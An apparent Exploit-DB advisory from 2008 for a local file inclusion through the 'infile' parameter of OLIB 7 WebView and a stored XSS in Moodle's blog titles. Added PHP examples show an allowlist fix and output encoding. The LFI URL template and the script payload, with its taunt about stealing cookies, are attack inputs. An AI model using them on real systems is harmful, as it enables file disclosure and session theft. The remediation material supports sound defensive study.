OLIB 7 WebView 2.5.1.1 - 'infile' Local File Inclusion

EDB-ID: 6653
Author: ZeN
Type: webapps
Platform: PHP
Date: 2008-10-02



Security Advisory for 'OLIB 7 Webview'

This software is part of Moodle.

Software - OLIB 7 WebView v2.5.1.1
Exploit  - LFI
Severity - High
Author   - ZeN
Website  - http://dusecurity.com/
Date     - 2nd October 2008

DUSecurity Team / DarkCode


Exploit >

http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]

Files in dir - get_settings.ini, setup.ini (contains config file locations), text.ini


Info - You need to login to get a valid session key.
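The defect behind this advisory is a file name taken straight from the `infile` parameter and opened on the server. The following is an added example of how a PHP request handler can accept an `infile` name safely; it is not OLIB or Moodle code. It assumes the handler is PHP, that the application's text files live in one fixed directory (`/var/www/olib/ini` is a placeholder) and that only a known set of them is ever meant to be served, so `setup.ini`, which the advisory says points at configuration files, is deliberately left off the allowlist.

```php
<?php
declare(strict_types=1);

// Added example (not OLIB/Moodle code). Assumed base directory and allowlist.
const INFILE_BASE_DIR = '/var/www/olib/ini';                 // placeholder location
const INFILE_ALLOWED  = ['get_settings.ini', 'text.ini'];    // setup.ini intentionally excluded

/**
 * Resolve a user-supplied "infile" value to a path inside INFILE_BASE_DIR.
 * Returns null whenever the request must be refused.
 */
function resolve_infile(string $requested): ?string
{
    // 1. Only a bare file name is acceptable: no slashes, backslashes or NUL bytes.
    if ($requested === '' || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }
    // 2. Allowlist rather than blocklist: anything not explicitly known is refused,
    //    which also disposes of "." and ".." without special-casing them.
    if (!in_array($requested, INFILE_ALLOWED, true)) {
        return null;
    }
    // 3. Canonicalise both sides and confirm the result is still under the base
    //    directory (guards against symlinks placed inside the directory).
    $base = realpath(INFILE_BASE_DIR);
    $path = realpath(INFILE_BASE_DIR . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Usage: decide before touching the filesystem, and log refusals so the
// attempts are visible to whoever reviews the logs.
$requested = (string)($_GET['infile'] ?? '');
$path = resolve_infile($requested);
if ($path === null) {
    // hex-encode the rejected value so it cannot inject newlines into the log
    error_log('infile rejected: ' . bin2hex($requested));
    http_response_code(400);
    exit('invalid infile');
}
readfile($path);
```

The order of the checks matters: the allowlist comparison is the control that actually closes the hole, while the bare-name and `realpath` checks are defence in depth for the day someone extends the list with a value that contains a separator or points at a symlink.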


------------------
Extraz :

Moodle Permanent XSS

In Moodle blogging system, simply make a new blog entry with the title

<script>alert()</script>

Now everyone that visits the blogging system will execute your XSS.
Go get some cookies =D

Enjoy!
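The blog title described above reaches other users' browsers because it is echoed into the page without encoding. As an added example (not Moodle's own code) the snippet below shows the two controls that address it: contextual output encoding of the title, and marking the session cookie `HttpOnly` so script that does run cannot read it. The `render_blog_title` function and its markup are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not Moodle's code): encode an untrusted blog-entry title on output.
function render_blog_title(string $title): string
{
    // ENT_QUOTES encodes both quote styles, so the value is also safe in attributes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<h2 class="blog-title">' . $safe . '</h2>';
}

// Session cookie hardening, set before session_start(): HttpOnly keeps the
// cookie out of document.cookie, SameSite limits cross-site sending.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Constructed sample: the exact title from the advisory.
$title = '<script>alert()</script>';
echo render_blog_title($title), PHP_EOL;
```

With the encoding in place the `<script>` tags arrive in the browser as `&lt;script&gt;` text inside the heading and are displayed rather than executed; the cookie flags do not stop the injection but remove the session-theft payoff the advisory alludes to.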

------------------


Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group

# milw0rm.com [2008-10-02]